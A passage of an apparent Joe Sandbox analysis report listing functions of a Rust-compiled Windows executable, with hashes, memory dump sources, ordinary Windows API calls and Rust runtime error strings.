                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$NtWaitForKeyedEvent$ntdll
                                          • API String ID: 1646373207-615976147
                                          • Opcode ID: 3ccd51594901d1869b000309158222a762aefc6accd8e77d49a7e69a880a248d
                                          • Instruction ID: 055a19ee7e6dfd8b1c8b32208c70d9364bde81687f5badaa2e1964ce1ac14313
                                          • Opcode Fuzzy Hash: 3ccd51594901d1869b000309158222a762aefc6accd8e77d49a7e69a880a248d
                                          • Instruction Fuzzy Hash: DE11B72AF18B45B4F600EB61AC466E8B7A4BB1A794FC44275DD6C13754EF3CD185D320
                                          Function 00007FF73A5B81F0 Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$EnvironmentVariable
                                          • String ID:
                                          • API String ID: 2691138088-0
                                          • Opcode ID: c15820f9f92ae5b14e7bd5bff7fe94e6e5aa0ab046b15112c40e521cd23fedab
                                          • Instruction ID: 399fdc2f7bebd91af0b721779ed6f4e05813a7af6cf40c014e247db3af7dfa10
                                          • Opcode Fuzzy Hash: c15820f9f92ae5b14e7bd5bff7fe94e6e5aa0ab046b15112c40e521cd23fedab
                                          • Instruction Fuzzy Hash: AD71046AA04BC1A9FB31AF35DC063E9A350BF12798F805175DE6C07785DF3CA2859320
                                          Function 00007FF73A59D2A0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ConsoleErrorLastWrite$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 1956605914-0
                                          • Opcode ID: 8425dd4cfdff9b90003e6f3d06f81a19a64ebf80eaa6ea24fe96e77914645e5d
                                          • Instruction ID: fdaeb8861e67dad7f5c34a0c918315b136a296b2e29675c7939aff51d0200759
                                          • Opcode Fuzzy Hash: 8425dd4cfdff9b90003e6f3d06f81a19a64ebf80eaa6ea24fe96e77914645e5d
                                          • Instruction Fuzzy Hash: 1E51F62BA0865265F720AB20E8067F9F351FB06794FC04279D94D4BBD8DF7CA585A320
                                          Function 00007FF73A5C1810 Relevance: 7.7, APIs: 5, Instructions: 154COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FileModuleName
                                          • String ID:
                                          • API String ID: 1026760046-0
                                          • Opcode ID: 19caae273b0da875c4717bfd7ae77d8c7d472897fcf2e478f70de5f367147e63
                                          • Instruction ID: fd0e91cb48c0b7e54a45e78ae571cddef0fe30ba670ec5daba0b2831752adf3b
                                          • Opcode Fuzzy Hash: 19caae273b0da875c4717bfd7ae77d8c7d472897fcf2e478f70de5f367147e63
                                          • Instruction Fuzzy Hash: 0951F36AB087C1A5F732AB619C067F9A254BB16BE4F804271DD6C077C9DF3CD3849220
                                          Function 00007FF73A5B7F90 Relevance: 7.7, APIs: 5, Instructions: 153COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CurrentDirectory
                                          • String ID:
                                          • API String ID: 3993060814-0
                                          • Opcode ID: 3b5a4b8aba8631c9e88389698d2e3385f0d2e61428e341b64a91fff2a58bde37
                                          • Instruction ID: 3575b6ae11fe679db45e003bb510de72bca9e975a438d0e3a50ec105be68fda3
                                          • Opcode Fuzzy Hash: 3b5a4b8aba8631c9e88389698d2e3385f0d2e61428e341b64a91fff2a58bde37
                                          • Instruction Fuzzy Hash: 7351E22AB08BC1A9F731AF21A8067F9A254BB167E4F805271DE6C067C5DF3CA2849310
                                          Function 00007FF73A5C8BB2 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorHandleLast$CurrentDuplicateProcess
                                          • String ID:
                                          • API String ID: 3697983210-0
                                          • Opcode ID: 51a0c76d86c3fd3e5577ca374b4faa03680486a3d5824ff4efeee5572e0a39db
                                          • Instruction ID: cf2cc5f7d5ee254aa4540d3f43ea3e578792e1036105140473a8cfeee366e141
                                          • Opcode Fuzzy Hash: 51a0c76d86c3fd3e5577ca374b4faa03680486a3d5824ff4efeee5572e0a39db
                                          • Instruction Fuzzy Hash: AF11777A70874196FB50AF61A4063A9A290FB45764F440675DEBD467C4CF7CD444E331
                                          Function 00007FF73A5BE9A0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 232COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ExclusiveLock$AcquireRelease
                                          • String ID: Box<dyn Any><unnamed>$cannot access a Thread Local Storage value during or after destructionlibrary\std\src\thread\local.rs
                                          • API String ID: 17069307-3513654867
                                          • Opcode ID: ba9ec0ee9d0da0e4b83f2079990da24f05f742cc25d940177cbc998a7be4e648
                                          • Instruction ID: 9b119b30ec93666b293d6ecb8389efcd6861f71be2bc9cf728b344870af111a4
                                          • Opcode Fuzzy Hash: ba9ec0ee9d0da0e4b83f2079990da24f05f742cc25d940177cbc998a7be4e648
                                          • Instruction Fuzzy Hash: 7CB18E2AA09B42A8FB15AF20D4423B8B7A0FB16749F884176DE4D03795DF3CE555D360
                                          Function 00007FF73A5CB6C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: NtCreateKeyedEvent$ntdll
                                          • API String ID: 1646373207-1373576770
                                          • Opcode ID: 3dd93b3f74e8961d775c3b06a70e0ff517d3f2cf7e37f77eebb61d25acaebb4a
                                          • Instruction ID: ac9b07e1b3dbd678eeef060dcd4b478bc0f83f60448f675b936ed92e951826ee
                                          • Opcode Fuzzy Hash: 3dd93b3f74e8961d775c3b06a70e0ff517d3f2cf7e37f77eebb61d25acaebb4a
                                          • Instruction Fuzzy Hash: 1AF02729F4A601A0FD05AB43BC869A0B6906F1ABD0FC84479CD0C03764EF3C9485E320
                                          Function 00007FF73A59DC90 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: SetThreadDescription$kernel32
                                          • API String ID: 1646373207-1950310818
                                          • Opcode ID: 1cf4770a8bc9c7e8d14e876d8fa85266524a8cef5f4efd105f7eac48e0c2b70b
                                          • Instruction ID: 2ece9d6fbf54d2c2df58f32913dddc26aefbd3c6a4dec23f490911d29371ea3e
                                          • Opcode Fuzzy Hash: 1cf4770a8bc9c7e8d14e876d8fa85266524a8cef5f4efd105f7eac48e0c2b70b
                                          • Instruction Fuzzy Hash: E3F05E1AB49B42F0FA15AB41ED468F0B3A06F4ABC1FD441B9CD1D07750EF3CA549E220
                                          Function 00007FF73A5CB650 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProc
                                          • String ID: SetThreadDescription$kernel32
                                          • API String ID: 1646373207-1950310818
                                          • Opcode ID: 495880e63ba6e2e4bbaf29f23c43d397f145353388585290ec06ee037616ea45
                                          • Instruction ID: 4f3e87207ae942eec0cbdfc706f121de3962364030da9fdf06f71efdda7796ca
                                          • Opcode Fuzzy Hash: 495880e63ba6e2e4bbaf29f23c43d397f145353388585290ec06ee037616ea45
                                          • Instruction Fuzzy Hash: FCE06559F46602A1FD05BB11EC46964B2645F1ABC0BC54474CC5C03364EF2CA485A330
                                          Function 00007FF73A5C3F70 Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                          Download Yara Rule
                                          APIs
                                          • CancelIo.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3F9C
                                          • GetOverlappedResult.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3FBE
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C3FD0
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,FFFFFFFE,00000000,?,?,00007FF73A5B29CD), ref: 00007FF73A5C402C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$CancelOverlappedResult
                                          • String ID:
                                          • API String ID: 3836860830-0
                                          • Opcode ID: df2e536d572762c621013ec7b02190549f69cf04ca19e672e78619bd8104048a
                                          • Instruction ID: f6de34a5c49f27dafba8242aa5a8f6d7e9d87dd84aa948ab5c88d7042acd7105
                                          • Opcode Fuzzy Hash: df2e536d572762c621013ec7b02190549f69cf04ca19e672e78619bd8104048a
                                          • Instruction Fuzzy Hash: 8341CF26F08A41A6F7209B65E8413BDB7B0BB95759F544134DE9E12794CF3CD481C320
                                          Function 00007FF73A5C3BF0 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventW.KERNEL32(?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3C20
                                          • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3C7D
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3CEE
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,00007FF73A5C38AD), ref: 00007FF73A5C3CF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CreateErrorEventLast
                                          • String ID:
                                          • API String ID: 3743700123-0
                                          • Opcode ID: 71769a7dfe9f521b8d0813c6e4acb70237b83f928696441012dfe861c3f2863e
                                          • Instruction ID: e2ceda10db7fa79641021e43a95f29c50ee424aeda53037b5c4f17f3f41b4f78
                                          • Opcode Fuzzy Hash: 71769a7dfe9f521b8d0813c6e4acb70237b83f928696441012dfe861c3f2863e
                                          • Instruction Fuzzy Hash: C521E437B04B4196F3219B21B8057A9BA60FB8A760F584234DFAD037D0EF3CA5929310
                                          Function 00007FF73A5BF340 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: Lock$AcquireExclusiveReleaseShared
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 3474408661-1397643090
                                          • Opcode ID: fc3151cb0325f79c267ac63e54fa84e451f57895b6ffa840e2c6db1b9b78d1f0
                                          • Instruction ID: cfd4d7191aa0760a7ef6df88853643c7197e32c127e2965261283cdd72a24540
                                          • Opcode Fuzzy Hash: fc3151cb0325f79c267ac63e54fa84e451f57895b6ffa840e2c6db1b9b78d1f0
                                          • Instruction Fuzzy Hash: EE915836A09B81A8F700DFA0E8413EC7BB0FB1A358F944179DA4C56B99DF78D199D360
                                          Function 00007FF73A5B7C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF73A5DD185), ref: 00007FF73A5B7CC2
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00007FF73A5DD185), ref: 00007FF73A5B7D39
                                          Strings
                                          • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00007FF73A5B7D6C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressCloseHandleWait
                                          • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyed
                                          • API String ID: 592885855-1431102515
                                          • Opcode ID: 124039ffd5e10664668c5a967f600eb0c1cf9ad3871b6a7582fe70e2bbb4998a
                                          • Instruction ID: e036e8e6954b5371a9b0504a1937fc8855ab8d408e250da9e162e889d25b277a
                                          • Opcode Fuzzy Hash: 124039ffd5e10664668c5a967f600eb0c1cf9ad3871b6a7582fe70e2bbb4998a
                                          • Instruction Fuzzy Hash: 4051D026A05B12A8FB20AB61E8027BDB764BB467A5FC40371DE6C13BD4DF38A145D360
                                          Function 00007FF73A5CA750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA77E
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA82D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorFrequencyLastPerformanceQuery
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 3362413890-2333694755
                                          • Opcode ID: d0a4ca38f6bda699d5ce83ab1afea9c978eeb5678c858de5d9e5b502f795a194
                                          • Instruction ID: 6ec04d513d425ffe764b7efae4f41508d36f69182747838021659e5ffd60ba18
                                          • Opcode Fuzzy Hash: d0a4ca38f6bda699d5ce83ab1afea9c978eeb5678c858de5d9e5b502f795a194
                                          • Instruction Fuzzy Hash: FA316BA6F04B86A5FB14AB64A8062F5B7A6AB86790FC0C176CE5D03798CF3C9141D360
                                          Function 00007FF73A5CA290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          • /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs, xrefs: 00007FF73A5CA326
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorGuaranteeLastStackThread
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 2304615615-1397643090
                                          • Opcode ID: 181ba004c8826d56e605718fb9483f1c33ce52e55c45f30ffd1b821f9de6fd66
                                          • Instruction ID: 43e7e5fb00d2c92ac9b71a819a89f189c6933a9c59c3e5930398b47b8ac03901
                                          • Opcode Fuzzy Hash: 181ba004c8826d56e605718fb9483f1c33ce52e55c45f30ffd1b821f9de6fd66
                                          • Instruction Fuzzy Hash: B931CF6AF10A01A9F700AB61D8422EC7B70FB86B54F948575EF9C53B98DF38D582C350
                                          Function 00007FF73A5BCE50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5AD8E8,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCE72
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5AD8E8,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCEB5
                                            • Part of subcall function 00007FF73A5CA750: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA77E
                                            • Part of subcall function 00007FF73A5BCC10: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,31786F62646E6173,33786F62646E6173,?,?,00007FF73A5BCE9F), ref: 00007FF73A5BCC46
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$Frequency$CounterErrorLast
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 361767260-2333694755
                                          • Opcode ID: 62747ca933552ee1192f10f8bb4ee3da08ea68651454a8d18092f047b71f3f22
                                          • Instruction ID: 25fdbe8da216e3cd92315db82b90ca319470e91cb9b4577d07eea083a4d08562
                                          • Opcode Fuzzy Hash: 62747ca933552ee1192f10f8bb4ee3da08ea68651454a8d18092f047b71f3f22
                                          • Instruction Fuzzy Hash: 0711AE76B04A41A9F710AB70D8476EC7730AB45314F808976DAAD03794DF38D286C390
                                          Function 00007FF73A5BCB70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00007FF73A5AD8C9,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCB8E
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF73A5AD8C9,?,?,?,?,?,?,00007FF73A5A5140), ref: 00007FF73A5BCBA8
                                            • Part of subcall function 00007FF73A5CA750: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,32786F62646E6173,?,00007FF73A5BCBA1,?,?,?,?,?,?,?), ref: 00007FF73A5CA77E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterErrorFrequencyLast
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 158728112-2333694755
                                          • Opcode ID: af70b1b00ff7058282bb8f2d014b1edccdfc6f1fc0f508830665f8a47a9826b0
                                          • Instruction ID: 804a4419121c6ca646afaf5663a71113a0197590e03f809d86cfdfcd4c4d7eae
